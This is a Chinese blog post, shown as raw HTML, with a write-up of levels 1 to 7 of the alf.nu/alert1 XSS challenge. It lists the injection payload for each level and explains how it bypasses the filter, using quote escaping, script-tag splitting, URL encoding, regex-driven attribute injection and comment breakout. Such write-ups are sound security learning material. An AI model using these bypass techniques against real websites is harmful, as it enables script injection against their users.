<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="XSS," />










<meta name="description" content="NO.1 WarmupInput:&amp;quot;);alert(1)// NO.2 AdobeInput:\&amp;quot;);alert(1)// 本关对输入的双引号进行了转义，再加一个反斜杠转义回来即可 NO.3 JSONInput:&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1);// 本关使用JSON.stringify()进行过滤，反斜杠也被过滤掉，但可以用scrip">
<meta name="keywords" content="XSS">
<meta property="og:type" content="article">
<meta property="og:title" content="alf.nu&#x2F;alert1 XSS 1-7">
<meta property="og:url" content="http://yoursite.com/2018/06/03/alf.nu-XSS/index.html">
<meta property="og:site_name" content="Lilin">
<meta property="og:description" content="NO.1 WarmupInput:&amp;quot;);alert(1)// NO.2 AdobeInput:\&amp;quot;);alert(1)// 本关对输入的双引号进行了转义，再加一个反斜杠转义回来即可 NO.3 JSONInput:&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1);// 本关使用JSON.stringify()进行过滤，反斜杠也被过滤掉，但可以用scrip">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-06-05T07:21:26.721Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="alf.nu&#x2F;alert1 XSS 1-7">
<meta name="twitter:description" content="NO.1 WarmupInput:&amp;quot;);alert(1)// NO.2 AdobeInput:\&amp;quot;);alert(1)// 本关对输入的双引号进行了转义，再加一个反斜杠转义回来即可 NO.3 JSONInput:&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1);// 本关使用JSON.stringify()进行过滤，反斜杠也被过滤掉，但可以用scrip">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/06/03/alf.nu-XSS/"/>





  <title>alf.nu/alert1 XSS 1-7 | Lilin</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Lilin</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/06/03/alf.nu-XSS/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Lilin">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Lilin">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">alf.nu/alert1 XSS 1-7</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-03T13:28:19+08:00">
                2018-06-03
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/XSS/" itemprop="url" rel="index">
                    <span itemprop="name">XSS</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="NO-1-Warmup"><a href="#NO-1-Warmup" class="headerlink" title="NO.1 Warmup"></a>NO.1 Warmup</h1><p>Input:<br><code>&quot;);alert(1)//</code></p>
<h1 id="NO-2-Adobe"><a href="#NO-2-Adobe" class="headerlink" title="NO.2 Adobe"></a>NO.2 Adobe</h1><p>Input:<br><code>\&quot;);alert(1)//</code></p>
<p>本关对输入的双引号进行了转义，再加一个反斜杠转义回来即可</p>
<h1 id="NO-3-JSON"><a href="#NO-3-JSON" class="headerlink" title="NO.3 JSON"></a>NO.3 JSON</h1><p>Input:<br><code>&lt;/script&gt;&lt;script&gt;alert(1);//</code></p>
<p>本关使用JSON.stringify()进行过滤，反斜杠也被过滤掉，但可以用script标签进行分割</p>
<h1 id="NO-4-JavaScript"><a href="#NO-4-JavaScript" class="headerlink" title="NO.4 JavaScript"></a>NO.4 JavaScript</h1><p>Input:<br><code>%22);alert(1)//</code><br><a id="more"></a></p>
<hr>
<blockquote>
<p>javascript伪协议：<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:void(0)"</span>&gt;</span>Content<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
</blockquote>
<blockquote>
<p>当浏览器装载这样的URL时，它将执行这个URL中包含的Javascript代码，并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串可以含有HTML标记，并被格式化，其显示与其他装载进浏览器的文档类型完全相同</p>
</blockquote>
<p>因为最后传递到url中所以用url编码绕过</p>
<h1 id="NO-5-Markdown"><a href="#NO-5-Markdown" class="headerlink" title="NO.5 Markdown"></a>NO.5 Markdown</h1><p>Input:<br><code>[[1|http://onerror=&#39;alert(1)&#39;]]</code></p>
<hr>
<p>本题主要考察正则有关知识<br>先是过滤掉了小于号和双引号，然后<br>“<code>[[1|http://onerror=&#39;alert(1)&#39;]]</code>“.replace(/(http:\/\/\S+)/g, ‘<a href="$1">$1</a>‘);<br>结果为：<br><code>[[1|&lt;a href=&quot;http://onerror=&#39;alert(1)&#39;]]&quot;&gt;http://onerror=&#39;alert(1)&#39;]]&lt;/a&gt;</code><br>然后<br>“<code>[[1|&lt;a href=&quot;http://onerror=&#39;alert(1)&#39;]]&quot;&gt;http://onerror=&#39;alert(1)&#39;]]&lt;/a&gt;</code>“.text = text.replace(/[[(\w+)|(.+?)]]/g, ‘<code>&lt;img alt=&quot;$2&quot; src=&quot;$1.gif&quot;&gt;</code>‘);<br>结果：<code>&lt;img alt=&quot;&lt;a href=&quot;http://onerror=&#39;alert(1)&#39;&quot; src=&quot;1.gif&quot;&gt;&quot;&gt;http://onerror=&#39;alert(1)&#39;]]&lt;/a&gt;</code></p>
<p>注意这里要用onerror而不是onload因为图片注定会加载失败</p>
<h1 id="NO-6-DOM"><a href="#NO-6-DOM" class="headerlink" title="NO.6 DOM"></a>NO.6 DOM</h1><p>Input:<br><code>Comment# --&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;!--</code> </p>
<hr>
<p>Function.apply(obj,args):</p>
<blockquote>
<p>obj：这个对象将代替Function类里this对象<br>args：这个是数组，它将作为参数传给Function（args–&gt;arguments）<br>apply方法能劫持另外一个对象的方法，继承另外一个对象的属性</p>
</blockquote>
<p>先用document.createComment()创建注释，然后再绕过注释</p>
<h1 id="NO-7-Callback"><a href="#NO-7-Callback" class="headerlink" title="NO.7 Callback"></a>NO.7 Callback</h1><p>Input:<br><code>&#39;#&#39;;alert(1);//</code></p>
<p>被单引号包围的双引号会被当成字符串处理，所以在这里前后都使用单引号，绕过双引号的限制</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"># XSS</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/01/sqli-lab-less17-22/" rel="next" title="sqli-labs less17-20">
                <i class="fa fa-chevron-left"></i> sqli-labs less17-20
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/05/sqlmap使用说明/" rel="prev" title="sqlmap使用说明">
                sqlmap使用说明 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/avatar.jpg"
                alt="Lilin" />
            
              <p class="site-author-name" itemprop="name">Lilin</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/soporbear" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:lilin07@foxmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-1-Warmup"><span class="nav-number">1.</span> <span class="nav-text">NO.1 Warmup</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-2-Adobe"><span class="nav-number">2.</span> <span class="nav-text">NO.2 Adobe</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-3-JSON"><span class="nav-number">3.</span> <span class="nav-text">NO.3 JSON</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-4-JavaScript"><span class="nav-number">4.</span> <span class="nav-text">NO.4 JavaScript</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-5-Markdown"><span class="nav-number">5.</span> <span class="nav-text">NO.5 Markdown</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-6-DOM"><span class="nav-number">6.</span> <span class="nav-text">NO.6 DOM</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NO-7-Callback"><span class="nav-number">7.</span> <span class="nav-text">NO.7 Callback</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Lilin</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
